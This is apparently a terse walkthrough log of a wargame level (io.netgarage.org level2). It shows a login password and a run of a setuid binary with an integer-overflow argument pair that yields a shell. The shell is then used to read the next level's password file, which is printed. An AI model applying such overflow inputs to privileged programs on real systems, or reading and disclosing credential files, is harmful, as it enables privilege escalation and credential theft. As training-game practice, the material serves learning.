level2@io.netgarage.org
password: XNWFtWKWHhaaXoKI
level2@io:~$ ls
level2@io:~$ ls -al
level2@io:~$ cd /levels/
level2@io:/levels$ ls
level2@io:/levels$ ls -las level02
level2@io:/levels$ ./level02   ------------> source code is available in level02.c
level2@io:/levels$ cat level02.c
level2@io:/levels$ ./level02 -2147483648 -1    --------> source code is available in level02.c   WIN!
sh-4.3$ whoami
sh-4.3$ cd /home/level3/
sh-4.3$ ls -al
sh-4.3$ cat .pass     --------->  OlhCmdZKbuzqngfz